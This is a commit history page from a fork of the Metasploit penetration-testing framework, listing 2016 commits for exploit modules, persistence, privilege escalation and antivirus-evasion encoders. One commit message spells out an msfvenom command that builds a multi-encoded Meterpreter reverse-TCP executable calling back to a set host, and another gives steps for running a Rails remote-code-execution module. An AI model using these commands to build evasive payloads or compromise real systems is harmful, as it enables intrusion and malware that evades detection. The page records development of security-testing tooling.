adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
41,886 Commits 27 Branches 1,043 Tags
f8a94de6710abe3042a26a9dca38dcccff2c93be
Commit Graph

21851 Commits

Author SHA1 Message Date
Pearce Barry 159446ce92 Ensure http_login scanner module saves passwds. 
Fixes #6983.  When the auxiliary/scanner/http/http_login module discovers a successful basic auth user+password combination, make sure we properly store the password by specifically telling the credentials gem that the private data we're storing is a :password.
 2016-06-30 16:58:39 -05:00
William Webb 1401a61f59 Land #6998, Fix #6984 Undefined method 'winver' in ms10_092_schelevator 2016-06-30 16:14:09 -05:00
agix 3edb0b3625 Reduce chance to get a null byte in the decoder stub 2016-06-30 19:14:32 +02:00
agix 31ea58d7f0 Inherit from Msf::Encoder::Xor to get key preventing badchars 
I guess it what Msf::Encoder::Xor find_bad_keys is for.
 2016-06-30 18:29:30 +02:00
wchen-r7 1ecef265a1 Do a fail_with in case nonce is not found at all 2016-06-30 11:21:45 -05:00
wchen-r7 e2b9225907 Fix #7022, Failing to find wpnonce in fetch_ninja_form_nonce 
This patch fixes a problem when the module is used against an older
version of ninja forms (such as 2.9.27), the nonce is found in a
hidden input instead of the JavaScript code, which actually causes
an undefined method 'gsub' bug in the module.

Fix #7022
 2016-06-30 11:15:38 -05:00
Tod Beardsley afbeb2b668 Land #7023, fixes for swagger exploit 
Thanks @sdavis-r7!

See #7015 as well.
 2016-06-30 10:54:34 -04:00
Tod Beardsley d1281b6594 Chmod to remove the exec bit. 2016-06-30 10:43:46 -04:00
Francesco 068a4007de Riverbed SteelCentral NetProfiler & NetExpress Exploit Module 
Changes to be committed:
    new file:   modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb
 2016-06-29 22:27:40 -04:00
agix 8a777bec41 Forget to rename function after msftidy correction 2016-06-29 23:30:48 +02:00
agix c489c5ce3e Add two x64 encoders to improve anti-virus evasion 2016-06-29 23:11:24 +02:00
agix 88bdee4d4b Pass service name in env to the encoders 2016-06-29 23:07:35 +02:00
William Vu 68bd4e2375 Fire and forget the shell 
Edge case where reverse_perl returns 302 when app is unconfigured.
 2016-06-29 14:51:05 -05:00
forzoni d414ea59c3 Remove bash dependency. Oops. 2016-06-28 22:39:45 -05:00
David Maloney 3d93c55174 move sshfactory into a mixin method 
use a convience method to DRY up creation
of the SSHFactory inside modules. This will make it easier
to apply changes as needed in future. Also changed msframework attr
to just framework as per our normal convention

MS-1688
 2016-06-28 15:23:12 -05:00
James Lee 4e63591ce8 Use the proper Author key, not Authors 2016-06-28 15:21:19 -05:00
David Maloney ee2d1d4fdc Merge branch 'master' into feature/MS-1688/net-ssh-cleanup 2016-06-28 15:00:35 -05:00
David Maloney 97f9ca4028 Merge branch 'master' into egypt/ruby-ntlm 2016-06-28 14:14:56 -05:00
Louis Sato d5d0b9e9b8 Revert "Land #6729, Speed up the datastore" 
This reverts commit c6b1955a5a, reversing
changes made to 4fb7472391.
 2016-06-28 13:39:52 -05:00
forzoni 5f044ffda0 s/print_warning/print_error. 2016-06-28 10:26:23 -05:00
forzoni 0635fee820 Move some log lines to vprint_status. 2016-06-28 03:28:41 -05:00
forzoni 6c11692b04 Add privilege escalation for host users that can access the docker daemon. 2016-06-28 03:24:41 -05:00
RageLtMan fcf8cda22f Add basic module for CVE-2016-2098 
ActionPack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2
implement unsafe dynamic rendering of inline content such that
passing ERB wrapped Ruby code leads to remote execution.

This module only implements the Ruby payloads, but can easily
be extended to use system calls to execute native/alternate
payload types as well.

Test Procedures:
  Clone https://github.com/hderms/dh-CVE_2016_2098
  Run bundle install to match gem versions to those in lockfile
  Run the rails server and configure the metasploit module:
    Set TARGETURI to /exploits
    Configure payload and handler options
  Execute the module, move on to post-exp
 2016-06-28 03:28:16 -04:00
William Vu 5f08591fef Add Nagios XI exploit 2016-06-27 15:17:18 -05:00
Scott Lee Davis 2480781409 pesky pry. 2016-06-27 01:55:49 -04:00
Scott Lee Davis c2b4e22b46 updated with discovered changes from k kali & documentation update changes requested. 2016-06-27 01:53:20 -04:00
h00die 1c20122648 fedora compatibility, added naming options 2016-06-25 08:43:55 -04:00
James Lee 058115c21f Land #7015, sdavis' swagger exploit 2016-06-24 16:13:51 -05:00
James Lee 15a1a9ed71 Raise if payload.arch doesn't match expected 
This is necessary when payload is a generic/* since we can't actually
figure out what we need the prefix/suffix to be because the generics are
a pain to extract the arch/platform info out of.

Also remove some unnecessary options.
 2016-06-24 16:08:47 -05:00
David Maloney 409e26351b remove test module 
sponge left in patient
 2016-06-24 15:12:47 -05:00
David Maloney 6c3871bd0c update ssh modules to use new SSHFactory 
updated all of our SSh based module to use the
new SSHFactory class to plug Rex::Sockets into
Net::SSH

MS-1688
 2016-06-24 13:55:28 -05:00
David Maloney 5bc513d6cd get ssh sessions working properly 
ssh sessions now working correctly

MD-1688
 2016-06-24 12:14:48 -05:00
wchen-r7 9f280d714e Land #6994, NetBIOS Name Brute Force Spoofing modules 2016-06-23 17:54:51 -05:00
Scott Davis 3fb9eae687 EOL space if a ruby devil. 2016-06-23 15:40:16 -07:00
Scott Davis b38b116c9a @ePaul comments added to description. 2016-06-23 15:33:11 -07:00
Tod Beardsley 08d08d2c95 Fix Java payload generator 2016-06-23 14:51:26 -05:00
Tod Beardsley 464808d825 First, put the RC data in the module proper 2016-06-23 14:43:37 -05:00
Tod Beardsley 92c70dab6f Real array, and fix PHP 2016-06-23 13:22:21 -05:00
Tod Beardsley ffabf26593 No Automatic target. 2016-06-23 12:50:23 -05:00
Tod Beardsley 7a36d03fe3 Trying multi arch 2016-06-23 12:34:51 -05:00
Scott Lee Davis 47674c77ad chmod 644 swagger_param_inject.rb 2016-06-23 11:49:16 -04:00
Scott Lee Davis fbd0bc4308 updated as per @egypt & @todb-r7 recommendations. 2016-06-23 11:41:54 -04:00
khr0x40sh 40d7de05ef Fix Payload Generation 
Payload generation now only occurs once and function 'setup_pay'
removed.  Payload is generated with cmd_psh_payload and is mutated to
fit dropped text file.
 2016-06-23 11:20:22 -04:00
Tod Beardsley fc79f3a2a9 Modify for only NodeJS 
Not sure if we can do multiple arch's in the same module. Doesn't look
like it's possible today.

See rapid7#7015
 2016-06-23 10:14:57 -05:00
Scott Davis 579a3bcf7c default payload is NOT text based, so do nothing with it. 2016-06-23 07:00:14 -07:00
agix 9bb5577320 Forget to push the fix for msftidy... 2016-06-23 15:23:40 +02:00
Scott Davis 47e4321424 CVE-2016-5641 2016-06-23 06:09:37 -07:00
agix 378208bc3d Move service stub in x86 encoder to be easily used. 
Add psexec option SERCVICE_STUB_ENCODER to allow a list of encoder to
encode the x86/service stub.
Add multiple_encode_payload function in payload_generator.rb to accept a
list of encoder (beginning with @ to not break the classic parsing of
encoder).
With this it would be possible to pass multiple encoder to msfvenom in
one execution.
./msfvenom -p windows/meterpreter/reverse_tcp LPORT=80
LHOST=192.168.100.11 -e
@x86/shikata_ga_nai,x86/misc_anti_emu:5,x86/shikata_ga_nai -x
template.exe -f exe-only -o meterpreter.exe
 2016-06-23 14:56:03 +02:00
h00die 18a3bf5f62 service persistence 2016-06-22 19:22:18 -04:00
wchen-r7 048741660c Land #6980, Add ClamAV Remote Command Transmitter 2016-06-22 15:50:45 -05:00